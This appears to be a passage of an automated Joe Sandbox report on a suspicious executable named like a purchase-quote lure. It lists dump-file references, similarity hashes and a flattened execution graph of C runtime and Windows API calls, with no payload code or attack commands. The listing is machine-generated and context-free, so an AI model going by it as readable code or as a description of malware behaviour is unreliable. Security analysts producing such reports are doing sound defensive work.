                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                              • Instruction ID: 1f72a7e7db10584d46f5d47bab472a29a69204e410489cb336b3e0253d2e012c
                                                              • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                              • Instruction Fuzzy Hash: 31F09631104918FFC712DFA5DD0499FBBA8EF06350B2580BAE841F7251D674DE019F99

                                                              Execution Graph

                                                              Execution Coverage:2%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:1.3%
                                                              Total number of Nodes:1649
                                                              Total number of Limit Nodes:1
                                                              execution_graph 7105 212081a0 7106 212081d9 7105->7106 7107 212081dd 7106->7107 7118 21208205 7106->7118 7108 21206368 _free 20 API calls 7107->7108 7109 212081e2 7108->7109 7111 212062ac _abort 26 API calls 7109->7111 7110 21208529 7112 21202ada _ValidateLocalCookies 5 API calls 7110->7112 7113 212081ed 7111->7113 7114 21208536 7112->7114 7115 21202ada _ValidateLocalCookies 5 API calls 7113->7115 7117 212081f9 7115->7117 7118->7110 7119 212080c0 7118->7119 7122 212080db 7119->7122 7120 21202ada _ValidateLocalCookies 5 API calls 7121 21208152 7120->7121 7121->7118 7122->7120 7400 2120a1e0 7403 2120a1fe 7400->7403 7402 2120a1f6 7407 2120a203 7403->7407 7404 2120aa53 21 API calls 7405 2120a42f 7404->7405 7405->7402 7406 2120a298 7406->7402 7407->7404 7407->7406 7123 212021a1 ___scrt_dllmain_exception_filter 7124 2120c7a7 7125 2120c7be 7124->7125 7130 2120c80d 7124->7130 7125->7130 7133 2120c7e6 GetModuleHandleA 7125->7133 7127 2120c872 7128 2120c835 GetModuleHandleA 7128->7130 7130->7127 7130->7128 7131 2120c85f GetProcAddress 7130->7131 7131->7130 7134 2120c7ef 7133->7134 7140 2120c80d 7133->7140 7142 2120c803 GetProcAddress 7134->7142 7137 2120c872 7138 2120c835 GetModuleHandleA 7138->7140 7140->7137 7140->7138 7141 2120c85f GetProcAddress 7140->7141 7141->7140 7143 2120c80d 7142->7143 7144 2120c872 7143->7144 7145 2120c835 GetModuleHandleA 7143->7145 7146 2120c85f GetProcAddress 7143->7146 7145->7143 7146->7143 5974 2120742b 5975 21207430 5974->5975 5977 21207453 5975->5977 5978 21208bae 5975->5978 5979 21208bdd 5978->5979 5980 21208bbb 5978->5980 5979->5975 5981 21208bd7 5980->5981 5982 21208bc9 RtlDeleteCriticalSection 5980->5982 5983 2120571e _free 20 API calls 5981->5983 5982->5981 5982->5982 5983->5979 6402 2120ac6b 6403 2120ac84 __startOneArgErrorHandling 6402->6403 6405 2120acad __startOneArgErrorHandling 6403->6405 6406 2120b2f0 6403->6406 6407 2120b329 __startOneArgErrorHandling 6406->6407 6409 2120b350 __startOneArgErrorHandling 6407->6409 6417 2120b5c1 6407->6417 6410 2120b393 6409->6410 6411 2120b36e 6409->6411 6430 2120b8b2 6410->6430 6421 2120b8e1 6411->6421 6414 2120b38e __startOneArgErrorHandling 6415 21202ada _ValidateLocalCookies 5 API calls 6414->6415 6416 2120b3b7 6415->6416 6416->6405 6418 2120b5ec __raise_exc 6417->6418 6419 2120b7e5 RaiseException 6418->6419 6420 2120b7fd 6419->6420 6420->6409 6422 2120b8f0 6421->6422 6423 2120b964 __startOneArgErrorHandling 6422->6423 6424 2120b90f __startOneArgErrorHandling 6422->6424 6425 2120b8b2 __startOneArgErrorHandling 20 API calls 6423->6425 6437 212078a3 6424->6437 6429 2120b95d 6425->6429 6428 2120b8b2 __startOneArgErrorHandling 20 API calls 6428->6429 6429->6414 6431 2120b8d4 6430->6431 6432 2120b8bf 6430->6432 6433 21206368 _free 20 API calls 6431->6433 6434 2120b8d9 6432->6434 6435 21206368 _free 20 API calls 6432->6435 6433->6434 6434->6414 6436 2120b8cc 6435->6436 6436->6414 6438 212078cb 6437->6438 6439 21202ada _ValidateLocalCookies 5 API calls 6438->6439 6440 212078e8 6439->6440 6440->6428 6440->6429 7147 212060ac 7148 212060dd 7147->7148 7150 212060b7 7147->7150 7149 212060c7 FreeLibrary 7149->7150 7150->7148 7150->7149 6441 2120506f 6442 21205081 6441->6442 6443 21205087 6441->6443 6444 21205000 20 API calls 6442->6444 6444->6443 5984 21205630 5985 2120563b 5984->5985 5987 21205664 5985->5987 5989 21205660 5985->5989 5990 21205eb7 5985->5990 5997 21205688 5987->5997 5991 21205c45 _abort 5 API calls 5990->5991 5992 21205ede 5991->5992 5993 21205ee7 5992->5993 5994 21205efc InitializeCriticalSectionAndSpinCount 5992->5994 5995 21202ada _ValidateLocalCookies 5 API calls 5993->5995 5994->5993 5996 21205f13 5995->5996 5996->5985 5998 212056b4 5997->5998 5999 21205695 5997->5999 5998->5989 6000 2120569f RtlDeleteCriticalSection 5999->6000 6000->5998 6000->6000 6445 21203370 6456 21203330 6445->6456 6457 21203342 6456->6457 6458 2120334f 6456->6458 6459 21202ada _ValidateLocalCookies 5 API calls 6457->6459 6459->6458 7408 212063f0 7409 21206400 7408->7409 7418 21206416 7408->7418 7410 21206368 _free 20 API calls 7409->7410 7411 21206405 7410->7411 7412 212062ac _abort 26 API calls 7411->7412 7414 2120640f 7412->7414 7415 21206480 7415->7415 7438 21204e76 7415->7438 7417 212064ee 7420 2120571e _free 20 API calls 7417->7420 7418->7415 7421 21206561 7418->7421 7427 21206580 7418->7427 7419 212064e5 7419->7417 7424 21206573 7419->7424 7444 212085eb 7419->7444 7420->7421 7453 2120679a 7421->7453 7425 212062bc _abort 11 API calls 7424->7425 7426 2120657f 7425->7426 7428 2120658c 7427->7428 7428->7428 7429 2120637b _abort 20 API calls 7428->7429 7430 212065ba 7429->7430 7431 212085eb 26 API calls 7430->7431 7432 212065e6 7431->7432 7433 212062bc _abort 11 API calls 7432->7433 7434 21206615 ___scrt_fastfail 7433->7434 7435 212066b6 FindFirstFileExA 7434->7435 7436 21206705 7435->7436 7437 21206580 26 API calls 7436->7437 7439 21204e8b 7438->7439 7440 21204e87 7438->7440 7439->7440 7441 2120637b _abort 20 API calls 7439->7441 7440->7419 7442 21204eb9 7441->7442 7443 2120571e _free 20 API calls 7442->7443 7443->7440 7447 2120853a 7444->7447 7445 2120854f 7446 21208554 7445->7446 7448 21206368 _free 20 API calls 7445->7448 7446->7419 7447->7445 7447->7446 7451 2120858b 7447->7451 7449 2120857a 7448->7449 7450 212062ac _abort 26 API calls 7449->7450 7450->7446 7451->7446 7452 21206368 _free 20 API calls 7451->7452 7452->7449 7454 212067a4 7453->7454 7455 212067b4 7454->7455 7456 2120571e _free 20 API calls 7454->7456 7457 2120571e _free 20 API calls 7455->7457 7456->7454 7458 212067bb 7457->7458 7458->7414 6460 21209e71 6462 21209e95 6460->6462 6461 21209f71 __startOneArgErrorHandling 6466 2120b2f0 21 API calls 6461->6466 6467 2120acad __startOneArgErrorHandling 6461->6467 6462->6461 6463 21209ee6 6462->6463 6464 21209ef8 6463->6464 6468 2120aa53 6463->6468 6466->6467 6469 2120aa70 RtlDecodePointer 6468->6469 6470 2120aa80 6468->6470 6469->6470 6471 2120ab0d 6470->6471 6474 2120ab02 6470->6474 6476 2120aab7 6470->6476 6471->6474 6475 21206368 _free 20 API calls 6471->6475 6472 21202ada _ValidateLocalCookies 5 API calls 6473 2120ac67 6472->6473 6473->6464 6474->6472 6475->6474 6476->6474 6477 21206368 _free 20 API calls 6476->6477 6477->6474 7155 21203eb3 7158 21205411 7155->7158 7159 2120541d _abort 7158->7159 7160 21205af6 _abort 38 API calls 7159->7160 7161 21205422 7160->7161 7162 212055a8 _abort 38 API calls 7161->7162 7163 2120544c 7162->7163 7164 21209db8 7165 21209dbf 7164->7165 7166 21209e20 7165->7166 7167 21209ddf 7165->7167 7168 2120aa17 21 API calls 7166->7168 7169 2120a90e 7166->7169 7167->7169 7171 2120aa17 21 API calls 7167->7171 7170 21209e6e 7168->7170 7172 2120a93e 7171->7172 6001 2120543d 6002 21205440 6001->6002 6005 212055a8 6002->6005 6016 21207613 6005->6016 6008 212055b8 6010 212055c2 IsProcessorFeaturePresent 6008->6010 6011 212055e0 6008->6011 6013 212055cd 6010->6013 6052 21204bc1 6011->6052 6046 212060e2 6013->6046 6055 21207581 6016->6055 6019 2120766e 6020 2120767a _abort 6019->6020 6021 21205b7a _abort 20 API calls 6020->6021 6024 212076a7 _abort 6020->6024 6027 212076a1 _abort 6020->6027 6021->6027 6022 212076f3 6023 21206368 _free 20 API calls 6022->6023 6025 212076f8 6023->6025 6035 2120771f 6024->6035 6072 21205671 RtlEnterCriticalSection 6024->6072 6069 212062ac 6025->6069 6027->6022 6027->6024 6036 212076d6 6027->6036 6031 2120777e 6043 212077a9 6031->6043 6074 21207665 6031->6074 6034 21207776 6038 21204bc1 _abort 28 API calls 6034->6038 6035->6031 6035->6034 6035->6043 6073 212056b9 RtlLeaveCriticalSection 6035->6073 6101 2120bdc9 6036->6101 6038->6031 6042 21207665 _abort 38 API calls 6042->6043 6077 2120782e 6043->6077 6044 2120780c 6044->6036 6045 21205af6 _abort 38 API calls 6044->6045 6045->6036 6047 212060fe ___scrt_fastfail 6046->6047 6048 2120612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6047->6048 6051 212061fb ___scrt_fastfail 6048->6051 6049 21202ada _ValidateLocalCookies 5 API calls 6050 21206219 6049->6050 6050->6011 6051->6049 6120 2120499b 6052->6120 6058 21207527 6055->6058 6057 212055ad 6057->6008 6057->6019 6059 21207533 ___scrt_is_nonwritable_in_current_image 6058->6059 6064 21205671 RtlEnterCriticalSection 6059->6064 6061 21207541 6065 21207575 6061->6065 6063 21207568 _abort 6063->6057 6064->6061 6068 212056b9 RtlLeaveCriticalSection 6065->6068 6067 2120757f 6067->6063 6068->6067 6104 21206231 6069->6104 6071 212062b8 6071->6036 6072->6035 6073->6034 6075 21205af6 _abort 38 API calls 6074->6075 6076 2120766a 6075->6076 6076->6042 6078 21207834 6077->6078 6079 212077fd 6077->6079 6119 212056b9 RtlLeaveCriticalSection 6078->6119 6079->6036 6079->6044 6081 21205af6 GetLastError 6079->6081 6082 21205b12 6081->6082 6083 21205b0c 6081->6083 6085 2120637b _abort 20 API calls 6082->6085 6087 21205b61 SetLastError 6082->6087 6084 21205e08 _abort 11 API calls 6083->6084 6084->6082 6086 21205b24 6085->6086 6088 21205b2c 6086->6088 6089 21205e5e _abort 11 API calls 6086->6089 6087->6044 6090 2120571e _free 20 API calls 6088->6090 6091 21205b41 6089->6091 6092 21205b32 6090->6092 6091->6088 6093 21205b48 6091->6093 6095 21205b6d SetLastError 6092->6095 6094 2120593c _abort 20 API calls 6093->6094 6096 21205b53 6094->6096 6097 212055a8 _abort 35 API calls 6095->6097 6098 2120571e _free 20 API calls 6096->6098 6099 21205b79 6097->6099 6100 21205b5a 6098->6100 6100->6087 6100->6095 6102 21202ada _ValidateLocalCookies 5 API calls 6101->6102 6103 2120bdd4 6102->6103 6103->6103 6105 21205b7a _abort 20 API calls 6104->6105 6106 21206247 6105->6106 6107 21206255 6106->6107 6108 212062a6 6106->6108 6112 21202ada _ValidateLocalCookies 5 API calls 6107->6112 6115 212062bc IsProcessorFeaturePresent 6108->6115 6110 212062ab 6111 21206231 _abort 26 API calls 6110->6111 6113 212062b8 6111->6113 6114 2120627c 6112->6114 6113->6071 6114->6071 6116 212062c7 6115->6116 6117 212060e2 _abort 8 API calls 6116->6117 6118 212062dc GetCurrentProcess TerminateProcess 6117->6118 6118->6110 6119->6079 6121 212049a7 _abort 6120->6121 6122 212049bf 6121->6122 6142 21204af5 GetModuleHandleW 6121->6142 6151 21205671 RtlEnterCriticalSection 6122->6151 6126 21204a65 6159 21204aa5 6126->6159 6130 21204a3c 6133 21204a54 6130->6133 6155 21204669 6130->6155 6131 21204a82 6162 21204ab4 6131->6162 6132 21204aae 6136 2120bdc9 _abort 5 API calls 6132->6136 6138 21204669 _abort 5 API calls 6133->6138 6141 21204ab3 6136->6141 6138->6126 6139 212049c7 6139->6126 6139->6130 6152 2120527a 6139->6152 6143 212049b3 6142->6143 6143->6122 6144 21204b39 GetModuleHandleExW 6143->6144 6145 21204b63 GetProcAddress 6144->6145 6150 21204b78 6144->6150 6145->6150 6146 21204b95 6148 21202ada _ValidateLocalCookies 5 API calls 6146->6148 6147 21204b8c FreeLibrary 6147->6146 6149 21204b9f 6148->6149 6149->6122 6150->6146 6150->6147 6151->6139 6170 21205132 6152->6170 6156 21204698 6155->6156 6157 21202ada _ValidateLocalCookies 5 API calls 6156->6157 6158 212046c1 6157->6158 6158->6133 6192 212056b9 RtlLeaveCriticalSection 6159->6192 6161 21204a7e 6161->6131 6161->6132 6193 21206025 6162->6193 6165 21204ae2 6168 21204b39 _abort 8 API calls 6165->6168 6166 21204ac2 GetPEB 6166->6165 6167 21204ad2 GetCurrentProcess TerminateProcess 6166->6167 6167->6165 6169 21204aea ExitProcess 6168->6169 6173 212050e1 6170->6173 6172 21205156 6172->6130 6174 212050ed ___scrt_is_nonwritable_in_current_image 6173->6174 6181 21205671 RtlEnterCriticalSection 6174->6181 6176 212050fb 6182 2120515a 6176->6182 6180 21205119 _abort 6180->6172 6181->6176 6185 21205182 6182->6185 6186 2120517a 6182->6186 6183 21202ada _ValidateLocalCookies 5 API calls 6184 21205108 6183->6184 6188 21205126 6184->6188 6185->6186 6187 2120571e _free 20 API calls 6185->6187 6186->6183 6187->6186 6191 212056b9 RtlLeaveCriticalSection 6188->6191 6190 21205130 6190->6180 6191->6190 6192->6161 6194 21206040 6193->6194 6195 2120604a 6193->6195 6197 21202ada _ValidateLocalCookies 5 API calls 6194->6197 6196 21205c45 _abort 5 API calls 6195->6196 6196->6194 6198 21204abe 6197->6198 6198->6165 6198->6166 6199 21201f3f 6200 21201f4b ___scrt_is_nonwritable_in_current_image 6199->6200 6217 2120247c 6200->6217 6202 21201f52 6203 21202041 6202->6203 6204 21201f7c 6202->6204 6211 21201f57 ___scrt_is_nonwritable_in_current_image 6202->6211 6240 21202639 IsProcessorFeaturePresent 6203->6240 6228 212023de 6204->6228 6207 21202048 6208 21201f8b __RTC_Initialize 6208->6211 6231 212022fc RtlInitializeSListHead 6208->6231 6210 21201f99 ___scrt_initialize_default_local_stdio_options 6232 212046c5 6210->6232 6215 21201fb8 6215->6211 6216 21204669 _abort 5 API calls 6215->6216 6216->6211 6218 21202485 6217->6218 6244 21202933 IsProcessorFeaturePresent 6218->6244 6222 21202496 6227 2120249a 6222->6227 6255 212053c8 6222->6255 6224 212024b1 6224->6202 6227->6202 6329 212024b5 6228->6329 6230 212023e5 6230->6208 6231->6210 6233 212046dc 6232->6233 6234 21202ada _ValidateLocalCookies 5 API calls 6233->6234 6235 21201fad 6234->6235 6235->6211 6236 212023b3 6235->6236 6237 212023b8 ___scrt_release_startup_lock 6236->6237 6238 21202933 ___isa_available_init IsProcessorFeaturePresent 6237->6238 6239 212023c1 6237->6239 6238->6239 6239->6215 6241 2120264e ___scrt_fastfail 6240->6241 6242 212026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6241->6242 6243 21202744 ___scrt_fastfail 6242->6243 6243->6207 6245 21202491 6244->6245 6246 212034ea 6245->6246 6247 212034ef ___vcrt_initialize_winapi_thunks 6246->6247 6266 21203936 6247->6266 6250 212034fd 6250->6222 6252 21203505 6253 21203510 6252->6253 6280 21203972 6252->6280 6253->6222 6321 21207457 6255->6321 6258 21203529 6259 21203532 6258->6259 6265 21203543 6258->6265 6260 2120391b ___vcrt_uninitialize_ptd 6 API calls 6259->6260 6261 21203537 6260->6261 6262 21203972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6261->6262 6263 2120353c 6262->6263 6325 21203c50 6263->6325 6265->6227 6267 2120393f 6266->6267 6269 21203968 6267->6269 6270 212034f9 6267->6270 6284 21203be0 6267->6284 6271 21203972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6269->6271 6270->6250 6272 212038e8 6270->6272 6271->6270 6302 21203af1 6272->6302 6275 212038fd 6275->6252 6278 21203918 6278->6252 6281 2120399c 6280->6281 6282 2120397d 6280->6282 6281->6250 6283 21203987 RtlDeleteCriticalSection 6282->6283 6283->6281 6283->6283 6289 21203a82 6284->6289 6286 21203bfa 6287 21203c18 InitializeCriticalSectionAndSpinCount 6286->6287 6288 21203c03 6286->6288 6287->6288 6288->6267 6290 21203aaa 6289->6290 6293 21203aa6 __crt_fast_encode_pointer 6289->6293 6290->6293 6295 212039be 6290->6295 6293->6286 6294 21203ac4 GetProcAddress 6294->6293 6297 212039cd try_get_first_available_module 6295->6297 6296 212039ea LoadLibraryExW 6296->6297 6298 21203a05 GetLastError 6296->6298 6297->6296 6299 21203a60 FreeLibrary 6297->6299 6300 21203a77 6297->6300 6301 21203a38 LoadLibraryExW 6297->6301 6298->6297 6299->6297 6300->6293 6300->6294 6301->6297 6303 21203a82 try_get_function 5 API calls 6302->6303 6304 21203b0b 6303->6304 6305 21203b24 TlsAlloc 6304->6305 6306 212038f2 6304->6306 6306->6275 6307 21203ba2 6306->6307 6308 21203a82 try_get_function 5 API calls 6307->6308 6309 21203bbc 6308->6309 6310 21203bd7 TlsSetValue 6309->6310 6311 2120390b 6309->6311 6310->6311 6311->6278 6312 2120391b 6311->6312 6313 2120392b 6312->6313 6314 21203925 6312->6314 6313->6275 6316 21203b2c 6314->6316 6317 21203a82 try_get_function 5 API calls 6316->6317 6318 21203b46 6317->6318 6319 21203b5e TlsFree 6318->6319 6320 21203b52 6318->6320 6319->6320 6320->6313 6324 21207470 6321->6324 6322 21202ada _ValidateLocalCookies 5 API calls 6323 212024a3 6322->6323 6323->6224 6323->6258 6324->6322 6326 21203c59 6325->6326 6328 21203c7f 6325->6328 6327 21203c69 FreeLibrary 6326->6327 6326->6328 6327->6326 6328->6265 6330 212024c4 6329->6330 6331 212024c8 6329->6331 6330->6230 6332 21202639 ___scrt_fastfail 4 API calls 6331->6332 6334 212024d5 ___scrt_release_startup_lock 6331->6334 6333 21202559 6332->6333 6334->6230 7173 212067bf 7178 212067f4 7173->7178 7176 212067db 7177 2120571e _free 20 API calls 7177->7176 7179 21206806 7178->7179 7180 212067cd 7178->7180 7181 21206836 7179->7181 7182 2120680b 7179->7182 7180->7176 7180->7177 7181->7180 7189 212071d6 7181->7189 7183 2120637b _abort 20 API calls 7182->7183 7184 21206814 7183->7184 7186 2120571e _free 20 API calls 7184->7186 7186->7180 7187 21206851 7188 2120571e _free 20 API calls 7187->7188 7188->7180 7190 212071e1 7189->7190 7191 21207209 7190->7191 7192 212071fa 7190->7192 7196 21207218 7191->7196 7198 21208a98 7191->7198 7193 21206368 _free 20 API calls 7192->7193 7197 212071ff ___scrt_fastfail 7193->7197 7205 21208acb 7196->7205 7197->7187 7199 21208aa3 7198->7199 7200 21208ab8 RtlSizeHeap 7198->7200 7201 21206368 _free 20 API calls 7199->7201 7200->7196 7202 21208aa8 7201->7202 7203 212062ac _abort 26 API calls 7202->7203 7204 21208ab3 7203->7204 7204->7196 7206 21208ae3 7205->7206 7207 21208ad8 7205->7207 7208 21208aeb 7206->7208 7215 21208af4 _abort 7206->7215 7217 212056d0 7207->7217 7210 2120571e _free 20 API calls 7208->7210 7213 21208ae0 7210->7213 7211 21208af9 7214 21206368 _free 20 API calls 7211->7214 7212 21208b1e RtlReAllocateHeap 7212->7213 7212->7215 7213->7197 7214->7213 7215->7211 7215->7212 7216 2120474f _abort 7 API calls 7215->7216 7216->7215 7218 2120570e 7217->7218 7219 212056de _abort 7217->7219 7220 21206368 _free 20 API calls 7218->7220 7219->7218 7221 212056f9 RtlAllocateHeap 7219->7221 7223 2120474f _abort 7 API calls 7219->7223 7222 2120570c 7220->7222 7221->7219 7221->7222 7222->7213 7223->7219 7459 21205bff 7467 21205d5c 7459->7467 7462 21205c13 7463 21205b7a _abort 20 API calls 7464 21205c1b 7463->7464 7465 21205c28 7464->7465 7466 21205c2b 11 API calls 7464->7466 7466->7462 7468 21205c45 _abort 5 API calls 7467->7468 7469 21205d83 7468->7469 7470 21205d9b TlsAlloc 7469->7470 7471 21205d8c 7469->7471 7470->7471 7472 21202ada _ValidateLocalCookies 5 API calls 7471->7472 7473 21205c09 7472->7473 7473->7462 7473->7463 6478 21208640 6481 21208657 6478->6481 6482 21208665 6481->6482 6483 21208679 6481->6483 6486 21206368 _free 20 API calls 6482->6486 6484 21208681 6483->6484 6485 21208693 6483->6485 6487 21206368 _free 20 API calls 6484->6487 6493 21208652 6485->6493 6494 212054a7 6485->6494 6488 2120866a 6486->6488 6490 21208686 6487->6490 6489 212062ac _abort 26 API calls 6488->6489 6489->6493 6492 212062ac _abort 26 API calls 6490->6492 6492->6493 6495 212054c4 6494->6495 6496 212054ba 6494->6496 6495->6496 6497 21205af6 _abort 38 API calls 6495->6497 6496->6493 6498 212054e5 6497->6498 6502 21207a00 6498->6502 6503 212054fe 6502->6503 6504 21207a13 6502->6504 6506 21207a2d 6503->6506 6504->6503 6510 21207f0f 6504->6510 6507 21207a40 6506->6507 6508 21207a55 6506->6508 6507->6508 6645 21206d7e 6507->6645 6508->6496 6511 21207f1b ___scrt_is_nonwritable_in_current_image 6510->6511 6512 21205af6 _abort 38 API calls 6511->6512 6513 21207f24 6512->6513 6514 21207f72 _abort 6513->6514 6522 21205671 RtlEnterCriticalSection 6513->6522 6514->6503 6516 21207f42 6523 21207f86 6516->6523 6521 212055a8 _abort 38 API calls 6521->6514 6522->6516 6524 21207f94 __fassign 6523->6524 6526 21207f56 6523->6526 6524->6526 6530 21207cc2 6524->6530 6527 21207f75 6526->6527 6644 212056b9 RtlLeaveCriticalSection 6527->6644 6529 21207f69 6529->6514 6529->6521 6531 21207d42 6530->6531 6534 21207cd8 6530->6534 6532 21207d90 6531->6532 6535 2120571e _free 20 API calls 6531->6535 6598 21207e35 6532->6598 6534->6531 6536 21207d0b 6534->6536 6541 2120571e _free 20 API calls 6534->6541 6537 21207d64 6535->6537 6538 21207d2d 6536->6538 6547 2120571e _free 20 API calls 6536->6547 6539 2120571e _free 20 API calls 6537->6539 6540 2120571e _free 20 API calls 6538->6540 6542 21207d77 6539->6542 6543 21207d37 6540->6543 6545 21207d00 6541->6545 6548 2120571e _free 20 API calls 6542->6548 6551 2120571e _free 20 API calls 6543->6551 6544 21207dfe 6552 2120571e _free 20 API calls 6544->6552 6558 212090ba 6545->6558 6546 21207d9e 6546->6544 6557 2120571e 20 API calls _free 6546->6557 6549 21207d22 6547->6549 6550 21207d85 6548->6550 6586 212091b8 6549->6586 6555 2120571e _free 20 API calls 6550->6555 6551->6531 6556 21207e04 6552->6556 6555->6532 6556->6526 6557->6546 6559 212090cb 6558->6559 6585 212091b4 6558->6585 6560 212090dc 6559->6560 6561 2120571e _free 20 API calls 6559->6561 6562 212090ee 6560->6562 6563 2120571e _free 20 API calls 6560->6563 6561->6560 6564 21209100 6562->6564 6565 2120571e _free 20 API calls 6562->6565 6563->6562 6566 21209112 6564->6566 6567 2120571e _free 20 API calls 6564->6567 6565->6564 6568 21209124 6566->6568 6569 2120571e _free 20 API calls 6566->6569 6567->6566 6570 21209136 6568->6570 6571 2120571e _free 20 API calls 6568->6571 6569->6568 6572 21209148 6570->6572 6573 2120571e _free 20 API calls 6570->6573 6571->6570 6574 2120915a 6572->6574 6575 2120571e _free 20 API calls 6572->6575 6573->6572 6576 2120916c 6574->6576 6577 2120571e _free 20 API calls 6574->6577 6575->6574 6578 2120917e 6576->6578 6579 2120571e _free 20 API calls 6576->6579 6577->6576 6580 2120571e _free 20 API calls 6578->6580 6582 21209190 6578->6582 6579->6578 6580->6582 6581 2120571e _free 20 API calls 6583 212091a2 6581->6583 6582->6581 6582->6583 6584 2120571e _free 20 API calls 6583->6584 6583->6585 6584->6585 6585->6536 6587 212091c5 6586->6587 6588 2120921d 6586->6588 6589 212091d5 6587->6589 6590 2120571e _free 20 API calls 6587->6590 6588->6538 6591 212091e7 6589->6591 6592 2120571e _free 20 API calls 6589->6592 6590->6589 6593 212091f9 6591->6593 6594 2120571e _free 20 API calls 6591->6594 6592->6591 6595 2120920b 6593->6595 6596 2120571e _free 20 API calls 6593->6596 6594->6593 6595->6588 6597 2120571e _free 20 API calls 6595->6597 6596->6595 6597->6588 6599 21207e60 6598->6599 6600 21207e42 6598->6600 6599->6546 6600->6599 6604 2120925d 6600->6604 6603 2120571e _free 20 API calls 6603->6599 6605 21207e5a 6604->6605 6606 2120926e 6604->6606 6605->6603 6640 21209221 6606->6640 6609 21209221 __fassign 20 API calls 6610 21209281 6609->6610 6611 21209221 __fassign 20 API calls 6610->6611 6612 2120928c 6611->6612 6613 21209221 __fassign 20 API calls 6612->6613 6614 21209297 6613->6614 6615 21209221 __fassign 20 API calls 6614->6615 6616 212092a5 6615->6616 6617 2120571e _free 20 API calls 6616->6617 6618 212092b0 6617->6618 6619 2120571e _free 20 API calls 6618->6619 6620 212092bb 6619->6620 6621 2120571e _free 20 API calls 6620->6621 6622 212092c6 6621->6622 6623 21209221 __fassign 20 API calls 6622->6623 6624 212092d4 6623->6624 6625 21209221 __fassign 20 API calls 6624->6625 6626 212092e2 6625->6626 6627 21209221 __fassign 20 API calls 6626->6627 6628 212092f3 6627->6628 6629 21209221 __fassign 20 API calls 6628->6629 6630 21209301 6629->6630 6631 21209221 __fassign 20 API calls 6630->6631 6632 2120930f 6631->6632 6633 2120571e _free 20 API calls 6632->6633 6634 2120931a 6633->6634 6635 2120571e _free 20 API calls 6634->6635 6636 21209325 6635->6636 6637 2120571e _free 20 API calls 6636->6637 6638 21209330 6637->6638 6639 2120571e _free 20 API calls 6638->6639 6639->6605 6641 21209258 6640->6641 6642 21209248 6640->6642 6641->6609 6642->6641 6643 2120571e _free 20 API calls 6642->6643 6643->6642 6644->6529 6646 21206d8a ___scrt_is_nonwritable_in_current_image 6645->6646 6647 21205af6 _abort 38 API calls 6646->6647 6652 21206d94 6647->6652 6649 21206e18 _abort 6649->6508 6650 212055a8 _abort 38 API calls 6650->6652 6652->6649 6652->6650 6653 2120571e _free 20 API calls 6652->6653 6654 21205671 RtlEnterCriticalSection 6652->6654 6655 21206e0f 6652->6655 6653->6652 6654->6652 6658 212056b9 RtlLeaveCriticalSection 6655->6658 6657 21206e16 6657->6652 6658->6657 7224 21207a80 7225 21207a8d 7224->7225 7226 2120637b _abort 20 API calls 7225->7226 7227 21207aa7 7226->7227 7228 2120571e _free 20 API calls 7227->7228 7229 21207ab3 7228->7229 7230 2120637b _abort 20 API calls 7229->7230 7234 21207ad9 7229->7234 7231 21207acd 7230->7231 7233 2120571e _free 20 API calls 7231->7233 7232 21205eb7 11 API calls 7232->7234 7233->7234 7234->7232 7235 21207ae5 7234->7235 6335 21207103 GetCommandLineA GetCommandLineW 6336 21205303 6339 212050a5 6336->6339 6348 2120502f 6339->6348 6342 2120502f 5 API calls 6343 212050c3 6342->6343 6352 21205000 6343->6352 6346 21205000 20 API calls 6347 212050d9 6346->6347 6349 21205048 6348->6349 6350 21202ada _ValidateLocalCookies 5 API calls 6349->6350 6351 21205069 6350->6351 6351->6342 6353 2120500d 6352->6353 6357 2120502a 6352->6357 6354 21205024 6353->6354 6355 2120571e _free 20 API calls 6353->6355 6356 2120571e _free 20 API calls 6354->6356 6355->6353 6356->6357 6357->6346 6659 2120af43 6660 2120af59 6659->6660 6661 2120af4d 6659->6661 6661->6660 6662 2120af52 CloseHandle 6661->6662 6662->6660 6663 2120a945 6665 2120a96d 6663->6665 6664 2120a9a5 6665->6664 6666 2120a997 6665->6666 6667 2120a99e 6665->6667 6672 2120aa17 6666->6672 6676 2120aa00 6667->6676 6673 2120aa20 6672->6673 6680 2120b19b 6673->6680 6677 2120aa20 6676->6677 6678 2120b19b __startOneArgErrorHandling 21 API calls 6677->6678 6679 2120a9a3 6678->6679 6681 2120b1da __startOneArgErrorHandling 6680->6681 6686 2120b25c __startOneArgErrorHandling 6681->6686 6690 2120b59e 6681->6690 6683 2120b286 6684 2120b8b2 __startOneArgErrorHandling 20 API calls 6683->6684 6685 2120b292 6683->6685 6684->6685 6688 21202ada _ValidateLocalCookies 5 API calls 6685->6688 